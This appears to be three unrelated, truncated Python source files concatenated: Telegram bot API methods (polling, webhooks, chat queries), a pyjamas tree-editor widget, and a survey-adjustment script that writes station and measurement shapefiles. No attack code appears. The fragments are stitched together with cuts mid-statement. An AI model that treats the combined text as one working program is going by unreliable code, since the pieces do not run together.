limit=100,
timeout=0,
network_delay=None,
read_latency=2.,
allowed_updates=None,
**kwargs):
"""Use this method to receive incoming updates using long polling.
Args:
offset (Optional[int]): Identifier of the first update to be returned. Must be greater
by one than the highest among the identifiers of previously received updates. By
default, updates starting with the earliest unconfirmed update are returned. An
update is considered confirmed as soon as getUpdates is called with an offset
higher than its update_id.
limit (Optional[int]): Limits the number of updates to be retrieved. Values between
1-100 are accepted. Defaults to 100.
allowed_updates (Optional[list[str]]): List the types of updates you want your bot to
receive. For example, specify
``["message", "edited_channel_post", "callback_query"]`` to only receive updates of
these types. See ``telegram.Update`` for a complete list of available update types.
Specify an empty list to receive all updates regardless of type (default). If not
specified, the previous setting will be used.
Please note that this parameter doesn't affect updates created before the call to
the setWebhook, so unwanted updates may be received for a short period of time.
timeout (Optional[int]): Timeout in seconds for long polling. Defaults to 0, i.e. usual
short polling. Be careful not to set this timeout too high, as the connection might
be dropped and there's no way of knowing it immediately (so most likely the failure
will be detected after the timeout had passed).
network_delay: Deprecated. Will be honoured as `read_latency` for a while but will be
removed in the future.
read_latency (Optional[float|int]): Grace time in seconds for receiving the reply from
server. Will be added to the `timeout` value and used as the read timeout from
server (Default: 2).
**kwargs (dict): Arbitrary keyword arguments.
Notes:
The main problem with long polling is that the connection may be dropped
without us noticing, so notifications stop arriving. To limit that risk,
choose a polling ``timeout`` that is long enough to be efficient but not
so long that a dropped connection goes undetected, together with a
``read_latency`` that is short, but not too short.
Long polling improves performance, but if the timeout is too long and the
connection is dropped, in many cases we won't know until both the long
polling timeout and the read latency have passed. If you experience
connection timeouts, you should tune these settings.
Returns:
list[:class:`telegram.Update`]
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/getUpdates'.format(self.base_url)
if network_delay is not None:
warnings.warn('network_delay is deprecated, use read_latency instead')
read_latency = network_delay
data = {'timeout': timeout}
if offset:
data['offset'] = offset
if limit:
data['limit'] = limit
if allowed_updates is not None:
data['allowed_updates'] = allowed_updates
# Ideally we'd use an aggressive read timeout for the polling. However,
# * Short polling should return within 2 seconds.
# * Long polling poses a different problem: the connection might have been dropped while
# waiting for the server to return and there's no way of knowing the connection had been
# dropped in real time.
result = self._request.post(url, data, timeout=float(read_latency) + float(timeout))
if result:
self.logger.debug('Getting updates: %s', [u['update_id'] for u in result])
else:
self.logger.debug('No new updates found.')
return [Update.de_json(u, self) for u in result]
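The offset semantics described in the docstring (confirm a batch by asking for the highest `update_id` plus one) lead to the classic polling loop. A minimal sketch against a stand-in fetcher, not the real `Bot.get_updates`:

```python
def drain_updates(get_updates):
    """Poll until no updates remain, confirming each batch by passing
    an offset one higher than the largest update_id seen so far."""
    received, offset = [], None
    while True:
        batch = get_updates(offset=offset)
        if not batch:
            return received
        received.extend(batch)
        # Confirm this batch: the next call starts after the highest id,
        # which tells the server these updates were processed.
        offset = max(u["update_id"] for u in batch) + 1
```

Skipping the offset bump would make the server re-deliver the same updates on every call.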
@log
def set_webhook(self,
url=None,
certificate=None,
timeout=None,
max_connections=40,
allowed_updates=None,
**kwargs):
"""Use this method to specify a url and receive incoming updates via an outgoing webhook.
Whenever there is an update for the bot, we will send an HTTPS POST request to the
specified url, containing a JSON-serialized Update. In case of an unsuccessful request, we
will give up after a reasonable amount of attempts.
Args:
url (str): HTTPS url to send updates to. Use an empty string to remove webhook
integration.
certificate (file): Upload your public key certificate so that the root certificate in
use can be checked.
max_connections (Optional[int]): Maximum allowed number of simultaneous HTTPS
connections to the webhook for update delivery, 1-100. Defaults to 40. Use lower
values to limit the load on your bot's server, and higher values to increase your
bot's throughput.
allowed_updates (Optional[list[str]]): List the types of updates you want your bot to
receive. For example, specify
``["message", "edited_channel_post", "callback_query"]`` to only receive updates of
these types. See ``telegram.Update`` for a complete list of available update types.
Specify an empty list to receive all updates regardless of type (default). If not
specified, the previous setting will be used.
Please note that this parameter doesn't affect updates created before the call to
the setWebhook, so unwanted updates may be received for a short period of time.
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url_ = '{0}/setWebhook'.format(self.base_url)
# Backwards-compatibility: 'url' used to be named 'webhook_url'
if 'webhook_url' in kwargs:
warnings.warn("The 'webhook_url' parameter has been renamed to 'url' in accordance "
"with the API")
if url is not None:
raise ValueError("The parameters 'url' and 'webhook_url' are mutually exclusive")
url = kwargs['webhook_url']
del kwargs['webhook_url']
data = {}
if url is not None:
data['url'] = url
if certificate:
data['certificate'] = certificate
if max_connections is not None:
data['max_connections'] = max_connections
if allowed_updates is not None:
data['allowed_updates'] = allowed_updates
result = self._request.post(url_, data, timeout=timeout)
return result
@log
def delete_webhook(self, timeout=None, **kwargs):
"""Use this method to remove webhook integration if you decide to switch back to
getUpdates. Returns True on success. Requires no parameters.
Args:
timeout (Optional[float]): If this value is specified, use it as the definitive timeout
(in seconds) for urlopen() operations.
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/deleteWebhook'.format(self.base_url)
data = {}
result = self._request.post(url, data, timeout=timeout)
return result
@log
def leave_chat(self, chat_id, timeout=None, **kwargs):
"""Use this method for your bot to leave a group, supergroup or channel.
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
bool: On success, `True` is returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/leaveChat'.format(self.base_url)
data = {'chat_id': chat_id}
result = self._request.post(url, data, timeout=timeout)
return result
@log
def get_chat(self, chat_id, timeout=None, **kwargs):
"""Use this method to get up to date information about the chat (current name of the user
for one-on-one conversations, current username of a user, group or channel, etc.).
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the one specified during creation of the connection
pool).
**kwargs (dict): Arbitrary keyword arguments.
Returns:
:class:`telegram.Chat`: On success, :class:`telegram.Chat` is
returned.
Raises:
:class:`telegram.TelegramError`
"""
url = '{0}/getChat'.format(self.base_url)
data = {'chat_id': chat_id}
result = self._request.post(url, data, timeout=timeout)
return Chat.de_json(result, self)
@log
def get_chat_administrators(self, chat_id, timeout=None, **kwargs):
"""Use this method to get a list of administrators in a chat. On success, returns an Array
of ChatMember objects that contains information about all chat administrators except other
bots. If the chat is a group or a supergroup and no administrators were appointed, only the
creator will be returned.
Args:
chat_id (int|str): Unique identifier for the target chat or username of the target
channel (in the format @channelusername).
timeout (Optional[int|float]): If this value is specified, use it as the read timeout
from the server (instead of the | |
# Repository: rwl/traitsbackendpyjamas
#------------------------------------------------------------------------------
# Copyright (c) 2007, Riverbank Computing Limited
# Copyright (c) 2009, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#------------------------------------------------------------------------------
""" Defines the tree editor for the PyQt user interface toolkit.
"""
#-------------------------------------------------------------------------------
# Imports:
#-------------------------------------------------------------------------------
import copy
from pyjamas.ui.Tree import Tree
from pyjamas.ui.TreeItem import TreeItem  # used below when building the root node
from pyjamas.ui.VerticalPanel import VerticalPanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.vertsplitpanel import VerticalSplitPanel
from pyjamas.ui.horizsplitpanel import HorizontalSplitPanel
from enthought.pyface.resource_manager \
import resource_manager
from enthought.traits.api \
import Any, Event
from enthought.traits.trait_base \
import enumerate
from enthought.traits.ui.api \
import TreeNode, ObjectTreeNode, MultiTreeNode
# FIXME: ToolkitEditorFactory is a proxy class defined here just for backward
# compatibility. The class has been moved to the
# enthought.traits.ui.editors.tree_editor file.
from enthought.traits.ui.editors.tree_editor \
import ToolkitEditorFactory
from enthought.traits.ui.undo \
import ListUndoItem
from enthought.traits.ui.menu \
import Menu, Action, Separator
#from clipboard \
# import clipboard, PyMimeData
from editor \
import Editor
#from helper \
# import open_fbi, pixmap_cache
#-------------------------------------------------------------------------------
# The core tree node menu actions:
#-------------------------------------------------------------------------------
NewAction = 'NewAction'
CopyAction = Action( name = 'Copy',
action = 'editor._menu_copy_node',
enabled_when = 'editor._is_copyable(object)' )
CutAction = Action( name = 'Cut',
action = 'editor._menu_cut_node',
enabled_when = 'editor._is_cutable(object)' )
PasteAction = Action( name = 'Paste',
action = 'editor._menu_paste_node',
enabled_when = 'editor._is_pasteable(object)' )
DeleteAction = Action( name = 'Delete',
action = 'editor._menu_delete_node',
enabled_when = 'editor._is_deletable(object)' )
RenameAction = Action( name = 'Rename',
action = 'editor._menu_rename_node',
enabled_when = 'editor._is_renameable(object)' )
#-------------------------------------------------------------------------------
# 'SimpleEditor' class:
#-------------------------------------------------------------------------------
class SimpleEditor ( Editor ):
""" Simple style of tree editor.
"""
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
# Is the tree editor scrollable? This value overrides the default.
scrollable = True
# Allows an external agent to set the tree selection
selection = Event
# The currently selected object
selected = Any
# The event fired when a tree node is clicked on:
click = Event
# The event fired when a tree node is double-clicked on:
dclick = Event
# The event fired when the application wants to veto an operation:
veto = Event
#---------------------------------------------------------------------------
# Finishes initializing the editor by creating the underlying toolkit
# widget:
#---------------------------------------------------------------------------
def init ( self, parent ):
""" Finishes initializing the editor by creating the underlying toolkit
widget.
"""
factory = self.factory
self._editor = None
if factory.editable:
# Check to see if the tree view is based on a shared trait editor:
if factory.shared_editor:
factory_editor = factory.editor
# If this is the editor that defines the trait editor panel:
if factory_editor is None:
# Remember which editor has the trait editor in the factory:
factory._editor = self
# Create the trait editor panel:
# self.control = Widget(panel)
self.control = VerticalPanel()
self.control._node_ui = self.control._editor_nid = None
# Check to see if there are any existing editors that are
# waiting to be bound to the trait editor panel:
editors = factory._shared_editors
if editors is not None:
for editor in factory._shared_editors:
# If the editor is part of this UI:
if editor.ui is self.ui:
# Then bind it to the trait editor panel:
editor._editor = self.control
# Indicate all pending editors have been processed:
factory._shared_editors = None
# We only needed to build the trait editor panel, so exit:
return
# Check to see if the matching trait editor panel has been
# created yet:
editor = factory_editor._editor
if (editor is None) or (editor.ui is not self.ui):
# If not, add ourselves to the list of pending editors:
shared_editors = factory_editor._shared_editors
if shared_editors is None:
factory_editor._shared_editors = shared_editors = []
shared_editors.append( self )
else:
# Otherwise, bind our trait editor panel to the shared one:
self._editor = editor.control
# Finally, create only the tree control:
self.control = self._tree = Tree()
else:
# If editable, create a tree control and an editor panel:
self._tree = Tree()
self._editor = sp = ScrollPanel()
# sp.setFrameShape(QtGui.QFrame.NoFrame)
sp._node_ui = sp._editor_nid = None
if factory.orientation == 'horizontal':
self.control = splitter = HorizontalSplitPanel()
self.control.setLeftWidget( self._tree )
self.control.setRightWidget( sp )
else:
self.control = splitter = VerticalSplitPanel()
self.control.setTopWidget( self._tree )
self.control.setBottomWidget( sp )
else:
# Otherwise, just create the tree control:
self.control = self._tree = Tree()
# Set up the mapping between objects and tree id's:
self._map = {}
# Initialize the 'undo state' stack:
self._undoable = []
# Synchronize external object traits with the editor:
self.sync_value( factory.selected, 'selected' )
self.sync_value( factory.click, 'click', 'to' )
self.sync_value( factory.dclick, 'dclick', 'to' )
self.sync_value( factory.veto, 'veto', 'from' )
#---------------------------------------------------------------------------
# Handles the 'selection' trait being changed:
#---------------------------------------------------------------------------
def _selection_changed ( self, selection ):
""" Handles the **selection** event.
"""
try:
self._tree.setSelectedItem( self._object_info( selection )[2] )
except Exception:
pass
#---------------------------------------------------------------------------
# Handles the 'selected' trait being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self, selected ):
""" Handles the **selected** trait being changed.
"""
if not self._no_update_selected:
self._selection_changed( selected )
#---------------------------------------------------------------------------
# Handles the 'veto' event being fired:
#---------------------------------------------------------------------------
def _veto_changed ( self ):
""" Handles the 'veto' event being fired.
"""
self._veto = True
#---------------------------------------------------------------------------
# Disposes of the contents of an editor:
#---------------------------------------------------------------------------
def dispose ( self ):
""" Disposes of the contents of an editor.
"""
if self._tree is not None:
# Stop the chatter (specifically about the changing selection).
# self._tree.blockSignals(True)
self._delete_node( self._tree.getItem(0) )
self._tree = None
super( SimpleEditor, self ).dispose()
#---------------------------------------------------------------------------
# Expands from the specified node the specified number of sub-levels:
#---------------------------------------------------------------------------
def expand_levels ( self, nid, levels, expand = True ):
""" Expands from the specified node the specified number of sub-levels.
"""
if levels > 0:
expanded, node, object = self._get_node_data( nid )
if self._has_children( node, object ):
self._expand_node( nid )
if expand:
nid.setState( True )
for cnid in self._nodes_for( nid ):
self.expand_levels( cnid, levels - 1 )
#---------------------------------------------------------------------------
# Updates the editor when the object trait changes external to the editor:
#---------------------------------------------------------------------------
def update_editor ( self ):
""" Updates the editor when the object trait changes externally to the
editor.
"""
tree = self._tree
# saved_state = {}
tree.clear()
object, node = self._node_for( self.value )
if node is not None:
if self.factory.hide_root:
nid = tree.getItem( 0 )
else:
nid = TreeItem( node.get_label( object ) )
# nid.setText(0, node.get_label(object))
# nid.setIcon(0, self._get_icon(node, object))
# nid.setToolTip(0, node.get_tooltip(object))
self._map[ id( object ) ] = [ ( node.children, nid ) ]
self._add_listeners( node, object )
self._set_node_data( nid, ( False, node, object) )
if self.factory.hide_root or self._has_children( node, object ):
self._expand_node( nid )
if not self.factory.hide_root:
nid.setState( True )
tree.setSelectedItem( nid )
self.expand_levels( nid, self.factory.auto_open, False )
# FIXME: Clear the current editor (if any)...
#---------------------------------------------------------------------------
# Returns the editor's control for indicating error status:
#---------------------------------------------------------------------------
def get_error_control ( self ):
""" Returns the editor's control for indicating error status.
"""
return self._tree
#---------------------------------------------------------------------------
# Appends a new node to the specified node:
#---------------------------------------------------------------------------
def _append_node ( self, nid, node, object ):
""" Appends a new node to the specified node.
"""
cnid = TreeItem( node.get_label(object) )
# cnid.setText(0, node.get_label(object))
# cnid.setIcon(0, self._get_icon(node, object))
# cnid.setToolTip(0, node.get_tooltip(object))
has_children = self._has_children(node, object)
self._set_node_data( cnid, ( False, node, object ) )
self._map.setdefault( id( object ), [] ).append(
( node.children, cnid ) )
self._add_listeners( node, object )
# Automatically expand the new node (if requested):
if has_children:
if node.can_auto_open( object ):
cnid.setState( True )
else:
# Qt only draws the control that expands the tree if there is a
# child.
{
'Stn1': station1,
'Msr': msr,
'Msr_SD': msr_SD,
'Adj': adj,
'Cor': cor,
'nStat': nStat,
'outlier': Outlier,
'matched': False
}
if msrType == 'R':
r_count += 1
station1 = line[2:22].strip()
flag = line[62:63]
data = line[67:].split()
msr = data[0]
adj = data[1]
cor = data[2]
msr_SD = data[3]
adj_SD = data[4]
res = data[5]
nStat = data[6]
pelzer = data[7]
PreAdjCor = data[8]
Outlier = line[204:205]
r_msrs[r_count] = {
'Stn1': station1,
'Msr': msr,
'Msr_SD': msr_SD,
'Adj': adj,
'Cor': cor,
'nStat': nStat,
'outlier': Outlier,
'matched': False
}
if msrType == 'D':
output = []
d_set += 1
pointing = 0
station1 = line[2:22].strip()
station2 = line[22:42].strip()
d_msrs[d_set] = {
'Stn1': station1,
'Stn2': station2
}
if msrType == ' ':
d_count += 1
pointing += 1
target = line[42:63].strip()
msr = line[72:86].strip()
adj = line[86:105].strip()
cor = line[105:117].strip()
dmsr_SD = line[117:130].strip()
dadj_SD = line[130:143].strip()
dres = line[143:156].strip()
dnStat = line[156:167].strip()
dpelzer = line[167:179].strip()
dPreAdjCor = line[179:193].strip()
doutlier = line[204:205].strip()
d_msrs[d_set][pointing] = {
'target': target,
'msr': msr,
'adj': adj,
'cor': cor,
'msr_SD': dmsr_SD,
'adj_SD': dadj_SD,
'res': dres,
'nStat': dnStat,
'pelzer': dpelzer,
'PreAdjCor': dPreAdjCor,
'outlier': doutlier
}
if line == '\n':
msr_switch = False
continue
if stn_switch:
if len(line) < 20:
stn_switch = False
continue
E = None
N = None
z = None
P = None
L = None
H = None
h = None
# Cartesian coords disabled for now
# X = None
# Y = None
# Z = None
stn = line[0:20].strip()
con = line[20:23]
results = line[25:].split()
r_count = 0
for ct in coord_types:
if ct == 'E':
E = float(results[r_count])
if ct == 'N':
N = float(results[r_count])
if ct == 'z':
z = int(results[r_count])
if ct == 'P':
P = gc.hp2dec(float(results[r_count]))
if ct == 'L':
L = gc.hp2dec(float(results[r_count]))
if ct == 'H':
H = float(results[r_count])
if ct == 'h':
h = float(results[r_count])
# if ct == 'X':
# X = float(results[r_count])
# if ct == 'Y':
# Y = float(results[r_count])
# if ct == 'Z':
# Z = float(results[r_count])
r_count += 1
# Don't forget about the qualities
SD_E = float(results[r_count])
SD_N = float(results[r_count + 1])
SD_U = float(results[r_count + 2])
# Read Station Description
if desc_index is None or desc_index == -1:
Desc = ''
else:
Desc = str(line[desc_index:].strip())
if E is None:
ENz = gc.geo2grid(P, L)
E = ENz[2]
N = ENz[3]
z = ENz[1]
stns[stn] = {
'con': con,
'E': E,
'N': N,
'z': z,
'P': P,
'L': L,
'H': H,
'h': h,
'SD_E': SD_E,
'SD_N': SD_N,
'SD_U': SD_U,
'Desc': Desc
}
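# The gc.hp2dec calls above convert latitude/longitude from HP notation to
# decimal degrees. As a rough illustration (a minimal sketch, assuming
# GeodePy's usual DDD.MMSSss packing; not the library's actual implementation):

```python
def hp2dec(hp):
    """Sketch of HP -> decimal degrees, assuming DDD.MMSSss packing
    (e.g. -37.2430 means 37 degrees 24 minutes 30 seconds South)."""
    sign = -1 if hp < 0 else 1
    hp = abs(hp)
    degrees = int(hp)
    minutes = int(hp * 100) % 100
    # Whatever digits remain after degrees and minutes are the seconds.
    seconds = hp * 10000 - (degrees * 100 + minutes) * 100
    return sign * (degrees + minutes / 60 + seconds / 3600)
```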
# projection function
def write_prj(file_name, ref_frame):
if ref_frame == 'GDA2020':
out_str = 'GEOGCS["GDA2020",DATUM["GDA2020",SPHEROID["GRS_1980",6378137.0,298.257222101]],' \
'PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433],AUTHORITY["EPSG",7844]]'
elif ref_frame == 'GDA94':
out_str = 'GEOGCS["GDA94",DATUM["D_GDA_1994",SPHEROID["GRS_1980",6378137,298.257222101]],' \
'PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]'
else:
out_str = None
if out_str is not None:
prj_fh = open(file_name + '.prj', 'w')
prj_fh.write(out_str)
prj_fh.close()
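# A quick usage sketch of the helper above: write_prj emits `<name>.prj` only
# for the two recognised frames and silently skips anything else. (File names
# here are hypothetical, and the WKT strings are abbreviated.)

```python
import os
import tempfile

def write_prj(file_name, ref_frame):
    # Condensed copy of the helper above: emit an ESRI WKT .prj
    # only when the reference frame is recognised.
    frames = {
        'GDA2020': 'GEOGCS["GDA2020",...]',  # full WKT as defined above
        'GDA94': 'GEOGCS["GDA94",...]',
    }
    out_str = frames.get(ref_frame)
    if out_str is not None:
        with open(file_name + '.prj', 'w') as prj_fh:
            prj_fh.write(out_str)

out_dir = tempfile.mkdtemp()
write_prj(os.path.join(out_dir, 'stations'), 'GDA2020')
write_prj(os.path.join(out_dir, 'stations_itrf'), 'ITRF2014')  # unrecognised: no file
```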
# ----------------------------------------------------------------------
# write stations
# ----------------------------------------------------------------------
if stns:
print(" writing stn shapefile ...")
write_prj(point_name, ref_frame)
w = shapefile.Writer(point_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Station', 'C', size=20)
w.field('Constraints', 'C', size=3)
w.field('Easting', 'N', decimal=4)
w.field('Northing', 'N', decimal=4)
w.field('Zone', 'N')
w.field('Latitude', 'N', decimal=10)
w.field('Longitude', 'N', decimal=10)
w.field('OHGT', 'N', decimal=4)
w.field('EHGT', 'N', decimal=4)
w.field('SD_E', 'N', decimal=4)
w.field('SD_N', 'N', decimal=4)
w.field('SD_U', 'N', decimal=4)
w.field('Description', 'C', size=20)
for s in stns:
w.point(stns[s]['L'], stns[s]['P'])
w.record(s, str(stns[s]['con']), float(stns[s]['E']), float(stns[s]['N']), int(stns[s]['z']), float(stns[s]['P']),
float(stns[s]['L']), float(stns[s]['H']), float(stns[s]['h']), float(stns[s]['SD_E']),
float(stns[s]['SD_N']), float(stns[s]['SD_U']), str(stns[s]['Desc']))
w.close()
# ----------------------------------------------------------------------
# write h_msrs
# ----------------------------------------------------------------------
if h_msrs:
print(" writing type H msr shapefile ...")
write_prj(h_msr_name, ref_frame)
w = shapefile.Writer(h_msr_name,shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Stn1', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for h in h_msrs:
w.point(stns[h_msrs[h]['Stn1']]['L'], stns[h_msrs[h]['Stn1']]['P'])
w.record(h_msrs[h]['Stn1'], h_msrs[h]['Msr'], h_msrs[h]['Msr_SD'], h_msrs[h]['Adj'],
h_msrs[h]['Cor'], h_msrs[h]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write r_msrs
# ----------------------------------------------------------------------
if r_msrs:
print(" writing type R msr shapefile ...")
write_prj(r_msr_name, ref_frame)
w = shapefile.Writer(r_msr_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Stn1', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for r in r_msrs:
w.point(stns[r_msrs[r]['Stn1']]['L'], stns[r_msrs[r]['Stn1']]['P'])
w.record(r_msrs[r]['Stn1'], r_msrs[r]['Msr'], r_msrs[r]['Msr_SD'], r_msrs[r]['Adj'],
r_msrs[r]['Cor'], r_msrs[r]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write b_msrs
# ----------------------------------------------------------------------
if b_msrs:
print(" writing type B msr shapefile ...")
write_prj(b_msr_name, ref_frame)
w = shapefile.Writer(b_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for b in b_msrs:
lon1 = stns[b_msrs[b]['Stn1']]['L']
lat1 = stns[b_msrs[b]['Stn1']]['P']
lon2 = stns[b_msrs[b]['Stn2']]['L']
lat2 = stns[b_msrs[b]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(b_msrs[b]['Stn1'], b_msrs[b]['Stn2'], b_msrs[b]['Msr'], b_msrs[b]['Msr_SD'], b_msrs[b]['Adj'],
b_msrs[b]['Cor'], b_msrs[b]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write l_msrs
# ----------------------------------------------------------------------
if l_msrs:
print(" writing type L msr shapefile ...")
write_prj(l_msr_name, ref_frame)
w = shapefile.Writer(l_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for l in l_msrs:
lon1 = stns[l_msrs[l]['Stn1']]['L']
lat1 = stns[l_msrs[l]['Stn1']]['P']
lon2 = stns[l_msrs[l]['Stn2']]['L']
lat2 = stns[l_msrs[l]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(l_msrs[l]['Stn1'], l_msrs[l]['Stn2'], l_msrs[l]['Msr'], l_msrs[l]['Msr_SD'], l_msrs[l]['Adj'],
l_msrs[l]['Cor'], l_msrs[l]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write e_msrs
# ----------------------------------------------------------------------
if e_msrs:
print(" writing type E msr shapefile ...")
write_prj(e_msr_name, ref_frame)
w = shapefile.Writer(e_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for e in e_msrs:
lon1 = stns[e_msrs[e]['Stn1']]['L']
lat1 = stns[e_msrs[e]['Stn1']]['P']
lon2 = stns[e_msrs[e]['Stn2']]['L']
lat2 = stns[e_msrs[e]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(e_msrs[e]['Stn1'], e_msrs[e]['Stn2'], e_msrs[e]['Msr'], e_msrs[e]['Msr_SD'], e_msrs[e]['Adj'],
e_msrs[e]['Cor'], e_msrs[e]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write m_msrs
# ----------------------------------------------------------------------
if m_msrs:
print(" writing type M msr shapefile ...")
write_prj(m_msr_name, ref_frame)
w = shapefile.Writer(m_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for m in m_msrs:
lon1 = stns[m_msrs[m]['Stn1']]['L']
lat1 = stns[m_msrs[m]['Stn1']]['P']
lon2 = stns[m_msrs[m]['Stn2']]['L']
lat2 = stns[m_msrs[m]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(m_msrs[m]['Stn1'], m_msrs[m]['Stn2'], m_msrs[m]['Msr'], m_msrs[m]['Msr_SD'], m_msrs[m]['Adj'],
m_msrs[m]['Cor'], m_msrs[m]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write g_msrs
# ----------------------------------------------------------------------
if g_msrs:
print(" writing type G msr shapefile ...")
write_prj(g_msr_name, ref_frame)
w = shapefile.Writer(g_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
w.field('cor_Z', 'N', decimal=4)
w.field('max_cor', 'N', decimal=4)
w.field('nStat_X', 'N', decimal=4)
w.field('nStat_Y', 'N', decimal=4)
w.field('nStat_Z', 'N', decimal=4)
w.field('max_nStat', 'N', decimal=4)
for g in g_msrs:
lon1 = stns[g_msrs[g]['Stn1']]['L']
lat1 = stns[g_msrs[g]['Stn1']]['P']
lon2 = stns[g_msrs[g]['Stn2']]['L']
lat2 = stns[g_msrs[g]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(g_msrs[g]['Stn1'], g_msrs[g]['Stn2'],
g_msrs[g]['Msr_X'], g_msrs[g]['Msr_Y'], g_msrs[g]['Msr_Z'],
g_msrs[g]['Msr_SD_X'], g_msrs[g]['Msr_SD_Y'], g_msrs[g]['Msr_SD_Z'],
g_msrs[g]['Adj_X'], g_msrs[g]['Adj_Y'], g_msrs[g]['Adj_Z'],
g_msrs[g]['Cor_X'], g_msrs[g]['Cor_Y'], g_msrs[g]['Cor_Z'], g_msrs[g]['Max_Cor'],
g_msrs[g]['nStat_X'], g_msrs[g]['nStat_Y'], g_msrs[g]['nStat_Z'], g_msrs[g]['Max_nStat']
)
w.close()
# ----------------------------------------------------------------------
# write x_msrs
# ----------------------------------------------------------------------
if x_msrs:
print(" writing type X msr shapefile ...")
write_prj(x_msr_name, ref_frame)
w = shapefile.Writer(x_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
